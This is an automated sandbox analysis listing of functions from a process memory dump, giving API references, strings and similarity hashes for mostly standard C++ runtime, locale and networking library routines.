
Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00587124
std::_Lockit::_Lockit.LIBCPMT ref: 0058712E

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 0058714E
numpunct.LIBCPMT ref: 00587168
__CxxThrowException@8.LIBVCRUNTIME ref: 00587185
std::_Facet_Register.LIBCPMT ref: 005871A4
std::_Lockit::~_Lockit.LIBCPMT ref: 005871AD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
String ID:
API String ID: 639073845-0
Opcode ID: e944d833c6a2d5a942ceeafe776d823eee5e5144d6c68859dd4be15709c9bd9e
Instruction ID: 2dfbe0e2e5fa92e00c970f04d2ce521629e8d9b26fb6f897ac3351582d966bc7
Opcode Fuzzy Hash: e944d833c6a2d5a942ceeafe776d823eee5e5144d6c68859dd4be15709c9bd9e
Instruction Fuzzy Hash: 1201CE36E001299BCF00FBA0C84AABD7B76BFA4720F64011AE811772D1DF78AA019795

Uniqueness

Uniqueness Score: -1.00%

Function 00593862, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00593869
std::_Lockit::_Lockit.LIBCPMT ref: 00593873

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00593893
messages.LIBCPMT ref: 005938AD
__CxxThrowException@8.LIBVCRUNTIME ref: 005938CA
std::_Facet_Register.LIBCPMT ref: 005938E9
std::_Lockit::~_Lockit.LIBCPMT ref: 005938F2

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
String ID:
API String ID: 2194591311-0
Opcode ID: a7984b193ca191829ed4c65aca3d18e8c10e43cec7d37ca05c5544852207ad03
Instruction ID: c0c35d098452521f26aedf12e537433e3c1df5586974bcf1c892cf21391b3d1d
Opcode Fuzzy Hash: a7984b193ca191829ed4c65aca3d18e8c10e43cec7d37ca05c5544852207ad03
Instruction Fuzzy Hash: 03018E72D0112997CF15FBA0D846ABD7B76BF84720F15011AF81177291EF78AA018796

Uniqueness

Uniqueness Score: -1.00%

Function 00593A39, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00593A40
std::_Lockit::_Lockit.LIBCPMT ref: 00593A4A

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00593A6A
moneypunct.LIBCPMT ref: 00593A84
__CxxThrowException@8.LIBVCRUNTIME ref: 00593AA1
std::_Facet_Register.LIBCPMT ref: 00593AC0
std::_Lockit::~_Lockit.LIBCPMT ref: 00593AC9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: 21764f7e54e9309afc37ab0858b7f61be1333494fd6437596249481dd30426bb
Instruction ID: 88578df1e4e9f3d30ab1f04c4b7cd988f11fcef5dd1afbca92e3a9240ba9b540
Opcode Fuzzy Hash: 21764f7e54e9309afc37ab0858b7f61be1333494fd6437596249481dd30426bb
Instruction Fuzzy Hash: 5101A572D001299BCF15FBA0C8469BD7B77BF94760F58011EE811772A1DF78AA018795

Uniqueness

Uniqueness Score: -1.00%

Function 004106A7, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004106AC

Strings

Already open, xrefs: 004106C6
The descriptor does not fit into the select call's fd_set, xrefs: 004106EF
End of file, xrefs: 004106D7
asio.misc error, xrefs: 004106F6
Element not found, xrefs: 004106E3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: Already open$Element not found$End of file$The descriptor does not fit into the select call's fd_set$asio.misc error
API String ID: 3519838083-1489422305
Opcode ID: 0e974919303888db856ae624f66fddceb7bc6d713ec0c067eb07c25d7527eddb
Instruction ID: d67ba4f39ddab518590b04328f340580a13f1bfa5124be1068f38476ce4b5b78
Opcode Fuzzy Hash: 0e974919303888db856ae624f66fddceb7bc6d713ec0c067eb07c25d7527eddb
Instruction Fuzzy Hash: 3DF0A471A44128A78B20DF55A8518EFBB65FBD5760F10440BF945D2240C6F849E1878B

Uniqueness

Uniqueness Score: -1.00%

Function 006A486D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006A4862,00000003,?,006A4802,00000003,00787658,0000000C,006A4915,00000003,00000002), ref: 006A488D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006A48A0
FreeLibrary.KERNEL32(00000000,?,?,?,006A4862,00000003,?,006A4802,00000003,00787658,0000000C,006A4915,00000003,00000002,00000000), ref: 006A48C3

Strings

mscoree.dll, xrefs: 006A4886
CorExitProcess, xrefs: 006A4898
0A, xrefs: 006A48B1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: 0A$CorExitProcess$mscoree.dll
API String ID: 4061214504-242658392
Opcode ID: 9df3df2a0e177dc7cd2e605b1649d3258fc5b3d1bd9aa78d63051723fbfae371
Instruction ID: 50e48b579043fcda82c136a0126160869b8aca19eaf4220f6d071175e2de8cb7
Opcode Fuzzy Hash: 9df3df2a0e177dc7cd2e605b1649d3258fc5b3d1bd9aa78d63051723fbfae371
Instruction Fuzzy Hash: DAF03170A00259ABEB11AB94DC49BDDBFB6EB44751F004168E805A6290DFB89E80CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004251D0, Relevance: 9.2, APIs: 6, Instructions: 235COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004251D5
EnterCriticalSection.KERNEL32(?), ref: 004251EC
LeaveCriticalSection.KERNEL32(?), ref: 00425335
EnterCriticalSection.KERNEL32(?), ref: 0042539A
EnterCriticalSection.KERNEL32(?), ref: 004253CB
LeaveCriticalSection.KERNEL32(?), ref: 00425459

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$Enter$Leave$H_prolog
String ID:
API String ID: 3611688910-0
Opcode ID: 9a75d3944daacedd1612f391adb11c25558a3478b56561f4861fd6577db82494
Instruction ID: be82eaf52be362a2a189a403c00c2ea7786056c823c26ae5aef6727efd013585
Opcode Fuzzy Hash: 9a75d3944daacedd1612f391adb11c25558a3478b56561f4861fd6577db82494
Instruction Fuzzy Hash: 0691EC71A00A15DFCB20DFA8D484BAEB7B5FF98310F50455EE89AA7241DB34A905CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004354B1, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 408COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004354B5

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 004354C0

Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2

Part of subcall function 004B0769: __EH_prolog.LIBCMT ref: 004B076E

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831

Strings

l, xrefs: 004354F4
1.38, xrefs: 004355CE, 004357CA
), xrefs: 00435962

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocatestd::_$ExceptionException@8RaiseThrow
String ID: )$1.38$l
API String ID: 1125004306-1949618500
Opcode ID: 504e85a61036c07d24c10633c8c45aa7ed5082947298907889488e7adcff6cf8
Instruction ID: dba261fe0062bf89d8650e79bf07336141051845fe5bab8e8fe89a5f1e21508d
Opcode Fuzzy Hash: 504e85a61036c07d24c10633c8c45aa7ed5082947298907889488e7adcff6cf8
Instruction Fuzzy Hash: 1FF1F871C0528CEADB10EBA9DD45BDDBBB89F66308F2040EEE04567192EB741F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00436C06, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 377COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00436C0A

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00436C15

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831

Part of subcall function 004D2AB3: __EH_prolog.LIBCMT ref: 004D2AB8

Strings

1.38, xrefs: 00436CD9, 00436EA1
_, xrefs: 00436C95
&, xrefs: 00437057

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateExceptionException@8RaiseThrowstd::_
String ID: &$1.38$_
API String ID: 3026593090-314876670
Opcode ID: 9c741b4a99d21a85cebe53f2d490824c525ed103dda6387bb6cda3213f407f7e
Instruction ID: 9aa80d079675541da15c3140e1ac0f82289acfbc554f7e60ef93281b904c0eaf
Opcode Fuzzy Hash: 9c741b4a99d21a85cebe53f2d490824c525ed103dda6387bb6cda3213f407f7e
Instruction Fuzzy Hash: A2E10671C0528CE9DB11EBA8DD45BEDBBB4AF66308F1041EEE04567182EA741F88CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00438240, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 375COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00438244

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0043824F

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831

Part of subcall function 004D2AB3: __EH_prolog.LIBCMT ref: 004D2AB8

Strings

&, xrefs: 00438691
v, xrefs: 004382CF
1.38, xrefs: 00438313, 004384DB

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateExceptionException@8RaiseThrowstd::_
String ID: &$1.38$v
API String ID: 3026593090-1349925522
Opcode ID: 60349d523018369a85f2f216a4be24e4265828b3a610f9d7e0c63cc3fd183866
Instruction ID: 1f5cb23f1696570e12f9c8a59af54159a068e5083953ff1ade9c3c51970046d4
Opcode Fuzzy Hash: 60349d523018369a85f2f216a4be24e4265828b3a610f9d7e0c63cc3fd183866
Instruction Fuzzy Hash: 20E11771C0428CE9DB11EBA8DD45BEDBBB8AF66308F1040DEE04567192EE781F88C765

Uniqueness

Uniqueness Score: -1.00%

Function 004B138C, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 337COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B1391

Strings

m->name.IsString(), xrefs: 004B1659
GetType() == kNumberType, xrefs: 004B13EE
IsObject(), xrefs: 004B160F, 004B162E
IsArray(), xrefs: 004B1551, 004B1573

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: GetType() == kNumberType$IsArray()$IsObject()$m->name.IsString()
API String ID: 3519838083-2893571818
Opcode ID: bb1620fed73518d74523bada9baee671c1284c108569a62fb72e0ca95a1f504a
Instruction ID: 060b823309b1ad59683174ad3ea1d653af472b11ad11056d46f369940099a37b
Opcode Fuzzy Hash: bb1620fed73518d74523bada9baee671c1284c108569a62fb72e0ca95a1f504a
Instruction Fuzzy Hash: 0FB1F671600600ABDB14AF25C8A2BEA7B95AF42354F14401EF54A9F3D2DF7D9D01C7B9

Uniqueness

Uniqueness Score: -1.00%

Function 00418CBA, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 319networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00418CBE

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00418CC9
gethostbyname.WS2_32(?), ref: 00418CFD
_strlen.LIBCMT ref: 00418E12

Part of subcall function 0041CF6B: __EH_prolog.LIBCMT ref: 0041CF70

Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E

Part of subcall function 0041CECB: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041CF30

Part of subcall function 004161F3: __EH_prolog.LIBCMT ref: 004161F8

Strings

$, xrefs: 00418D46

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrd_sleepThrowUnothrow_t@std@@@__ehfuncinfo$??2@_strlengethostbyname
String ID: $
API String ID: 3595494107-3993045852
Opcode ID: 5d1cbfa81a4b644bc9df040698909c0017255d3725fa4be6675dc607af722bf4
Instruction ID: 9fa8e1347a3b5d6a324549be710af1b370aea4fd853bc4809eec5a16e8616f21
Opcode Fuzzy Hash: 5d1cbfa81a4b644bc9df040698909c0017255d3725fa4be6675dc607af722bf4
Instruction Fuzzy Hash: 29D1707180425CEEDF15DBA4DC85BEEB7B8BF14304F1041AFE109A6192EB746B88CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004B297E, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B2983
std::_Lockit::_Lockit.LIBCPMT ref: 004B2992

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 004B29B2
__CxxThrowException@8.LIBVCRUNTIME ref: 004B29E9
std::_Facet_Register.LIBCPMT ref: 004B29FF
std::_Lockit::~_Lockit.LIBCPMT ref: 004B2A0C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 202a26346cecd9aefb5768aadbd2006732c1901e8ba45af2b5a955188053243c
Instruction ID: f7ca5fcf15a29ee73de0f63c4ec1933b637445bf0b6068ffe5ed26652d83c923
Opcode Fuzzy Hash: 202a26346cecd9aefb5768aadbd2006732c1901e8ba45af2b5a955188053243c
Instruction Fuzzy Hash: 8811A772E0052997CB14FBA4D905AEE7775FF84720F10026EF815B7291DF789A01C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 004B2A23, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B2A28
std::_Lockit::_Lockit.LIBCPMT ref: 004B2A37

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 004B2A57
__CxxThrowException@8.LIBVCRUNTIME ref: 004B2A8E
std::_Facet_Register.LIBCPMT ref: 004B2AA4
std::_Lockit::~_Lockit.LIBCPMT ref: 004B2AB1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 51c68c6e5f0bdad96a5cd2fde2d68645632b674c3427c94835c50d3f68f9f0a4
Instruction ID: c8886ba17a3d5485cd5e1aa7785e1a44f9bf67971395e215b002f34403b44444
Opcode Fuzzy Hash: 51c68c6e5f0bdad96a5cd2fde2d68645632b674c3427c94835c50d3f68f9f0a4
Instruction Fuzzy Hash: 01110A72E005299BCB20FBA4D905AEE7775FF94720F50022EF811B7291DB789E0187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004B2AC8, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B2ACD
std::_Lockit::_Lockit.LIBCPMT ref: 004B2ADC

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 004B2AFC
__CxxThrowException@8.LIBVCRUNTIME ref: 004B2B33
std::_Facet_Register.LIBCPMT ref: 004B2B49
std::_Lockit::~_Lockit.LIBCPMT ref: 004B2B56

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 65ce447762173529b6536825b45d556c6ad68a1dfdabc986c51eb9bf05b57350
Instruction ID: 1391fae416d80c1b39bd808fabaa72711b772ef6f3f2cacb19c242c4ba372aee
Opcode Fuzzy Hash: 65ce447762173529b6536825b45d556c6ad68a1dfdabc986c51eb9bf05b57350
Instruction Fuzzy Hash: 1511C432E045299BCB14FFA4D9059EEBB75EF84720F10065EF81567291DF789A0187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004B2B6D, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B2B72
std::_Lockit::_Lockit.LIBCPMT ref: 004B2B81

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 004B2BA1
__CxxThrowException@8.LIBVCRUNTIME ref: 004B2BD8
std::_Facet_Register.LIBCPMT ref: 004B2BEE
std::_Lockit::~_Lockit.LIBCPMT ref: 004B2BFB

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: eff65316c8d1bddb7be57a432636777433a33a1dae658c0c6c577b745bd00f5d
Instruction ID: 0ffda2dfe26c43bc4056b07ad5696aae978b47293d48c948269ed516ba1da668
Opcode Fuzzy Hash: eff65316c8d1bddb7be57a432636777433a33a1dae658c0c6c577b745bd00f5d
Instruction Fuzzy Hash: A411C172E045299BCB18FFA4C905AEE7B75FF84720F10026EF811A7291DF789A01C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 004B2C12, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B2C17
std::_Lockit::_Lockit.LIBCPMT ref: 004B2C26

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 004B2C46
__CxxThrowException@8.LIBVCRUNTIME ref: 004B2C7D
std::_Facet_Register.LIBCPMT ref: 004B2C93
std::_Lockit::~_Lockit.LIBCPMT ref: 004B2CA0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: 56a66ee146ac4cbdd3be01a2bfd2a2dd40d2f6ea9210b31f2c1411a636807fd7
Instruction ID: 2dcc7b35d4edc1ae001f1dfcbc206a6e3d61c6b6d06d438f9a0bd2069ddf3514
Opcode Fuzzy Hash: 56a66ee146ac4cbdd3be01a2bfd2a2dd40d2f6ea9210b31f2c1411a636807fd7
Instruction Fuzzy Hash: 4011E772D005299BCB10FFA4D905AEE7B75FF84720F50021EF815B7291DB789A0187E4

Uniqueness

Uniqueness Score: -1.00%

Function 004B2E78, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B2E7D
std::_Lockit::_Lockit.LIBCPMT ref: 004B2E8C

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 004B2EAC
__CxxThrowException@8.LIBVCRUNTIME ref: 004B2EE3
std::_Facet_Register.LIBCPMT ref: 004B2EF9
std::_Lockit::~_Lockit.LIBCPMT ref: 004B2F06

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 1252875284-0
Opcode ID: e9f1efcb30548e9e56ec2ab87a8486d8545c1c2fe74b22e49fea07ea815be4a4
Instruction ID: afdd4069f02c412dbe3d57c8cccc2ad05612a5f581e3fcd064c8c3d27ab09a31
Opcode Fuzzy Hash: e9f1efcb30548e9e56ec2ab87a8486d8545c1c2fe74b22e49fea07ea815be4a4
Instruction Fuzzy Hash: E911A332E006299BCB14FBA5C905AEEBB75FF84720F14461EF815772D1DB789A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00586576, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058657D
std::_Lockit::_Lockit.LIBCPMT ref: 00586587

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005865A7
__CxxThrowException@8.LIBVCRUNTIME ref: 005865DE
std::_Facet_Register.LIBCPMT ref: 005865FD
std::_Lockit::~_Lockit.LIBCPMT ref: 00586606

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 728bac705d2dbfbe79f6e58030f12c29b71d89cdc6424652ec309150d387ddab
Instruction ID: b1d9a8a20fde25a5080b252a2a8d5375113aa7026780cc94b7247eb34f0af1f4
Opcode Fuzzy Hash: 728bac705d2dbfbe79f6e58030f12c29b71d89cdc6424652ec309150d387ddab
Instruction Fuzzy Hash: E501CE32D0012A9BDF00FBA0C856ABD7B72BF84720F54011AE81177291DF78AA028796

Uniqueness

Uniqueness Score: -1.00%

Function 00586924, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058692B
std::_Lockit::_Lockit.LIBCPMT ref: 00586935

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586955
__CxxThrowException@8.LIBVCRUNTIME ref: 0058698C
std::_Facet_Register.LIBCPMT ref: 005869AB
std::_Lockit::~_Lockit.LIBCPMT ref: 005869B4

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: c540214dbd9fd79dfc83ffccc5696e7092c841e996cdecf1f91a713145f39ea9
Instruction ID: 888cae3a08cb71bc11ca5a5ba79301200541db8d5ea92d9fc258bc731e18622d
Opcode Fuzzy Hash: c540214dbd9fd79dfc83ffccc5696e7092c841e996cdecf1f91a713145f39ea9
Instruction Fuzzy Hash: 0C01E132D001298BCF01FBA0CC46ABD7B72BF80720F54051EE9117B2D1DF78AA028795

Uniqueness

Uniqueness Score: -1.00%

Function 005869C1, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005869C8
std::_Lockit::_Lockit.LIBCPMT ref: 005869D2

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005869F2
__CxxThrowException@8.LIBVCRUNTIME ref: 00586A29
std::_Facet_Register.LIBCPMT ref: 00586A48
std::_Lockit::~_Lockit.LIBCPMT ref: 00586A51

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: e415e55a5d8efd876f87e92c500efcb556197f03e0ebf5557ea5fc5ef338edb2
Instruction ID: ddebc9e008ff21db6ecf431c3f9dd0193040618675104334071ab59956850f81
Opcode Fuzzy Hash: e415e55a5d8efd876f87e92c500efcb556197f03e0ebf5557ea5fc5ef338edb2
Instruction Fuzzy Hash: 1C01CE32D0012A9BCF05FBA0DC46ABD7B76BF94720F54411AE8117B291DF78AA018785

Uniqueness

Uniqueness Score: -1.00%

Function 00586A5E, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586A65
std::_Lockit::_Lockit.LIBCPMT ref: 00586A6F

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586A8F
__CxxThrowException@8.LIBVCRUNTIME ref: 00586AC6
std::_Facet_Register.LIBCPMT ref: 00586AE5
std::_Lockit::~_Lockit.LIBCPMT ref: 00586AEE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 6bf8fae17d1c55b3f8095170f8c441afd9e57401c1fd8f899d30954374e1038b
Instruction ID: dc492d7c1f575ad321867507ed50d752874cd23006525941ac5387cd1d2b70e4
Opcode Fuzzy Hash: 6bf8fae17d1c55b3f8095170f8c441afd9e57401c1fd8f899d30954374e1038b
